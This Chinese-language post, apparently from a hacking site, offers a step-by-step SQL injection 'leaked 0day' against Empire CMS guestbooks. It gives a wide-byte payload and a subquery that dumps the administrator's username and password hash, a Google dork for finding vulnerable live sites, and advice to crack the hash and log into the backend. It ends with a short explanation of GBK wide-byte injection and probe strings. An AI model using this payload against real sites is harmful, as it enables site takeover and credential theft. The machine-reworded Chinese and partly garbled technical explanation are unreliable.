深灰丢出来的0day.
找到行使帝国CMS的站,网址后头直接加:e/tool/gbook/?bid=1
譬喻:?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
接洽邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号暗码
测试要领:操作google搜刮要害字 inurl:e/tool/gbook/?bid=1,然后依照上面方法留言,表现功效即爆出打点员帐号和暗码md5值,破解暗码登岸靠山。
只发布了oday的操作要领,并没有声名个中的一些道理,本日壮壮胆,跟各人说明一下
1.这个裂痕就是php注入,上面的注入语句各人也看到了
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
查询phome_enewsuser表段中username,password,rnd三个字段信息,查询的前提是userid=1,排在第一位的,预计也是打点员,虽然假如网站存在多个打点员,可以把1换成其他数字
2.姓名处写:縗\
为什么要写:縗\?这里涉及到一个双字节裂痕
要知道这个必要相识几个常识点
1)假如安装过php情形的伴侣应该知道,在php.ini中有一个get_magic_quotes_gpc成果
当这个成果打开时,全部的 ' (单引号), " (双引号), \ (反斜线) and 空字符会自动加上转义符\
当这个成果开启时,字符串可以直接入库
2)注入各人知道,要用到“and” ,and被php转义为%df,因为 get_magic_quotes_gpc开启,以是自动插手了“\” ,“\"转换为十六进制后为%5C 。
因为看出,着实我们输入“and”被php转义成为%df%5c
可是当这些字符进入mysql数据库举办GBK编码时,就会被以为这是一个宽字符,也就是"縗"
总结一下:
%df'?==>? %df\'??==> ?%df%5c'??==> ?縗'
这就是php中常见的宽字节裂痕,也称双字节裂痕
如我们在平常的检测进程中更换原本的 and 1=1
%df%27 or 1=1/*
%df%27 or 1=2/*
【声明】:黑吧安详网()刊登此文出于转达更多信息之目标,并不代表本站拥护其概念和对其真实性认真,仅适于收集安详技能喜爱者进修研究行使,进修中请遵循国度相干法令礼貌。若有题目请接洽我们,接洽邮箱admin@myhack58.com,我们会在最短的时刻内举办处理赏罚。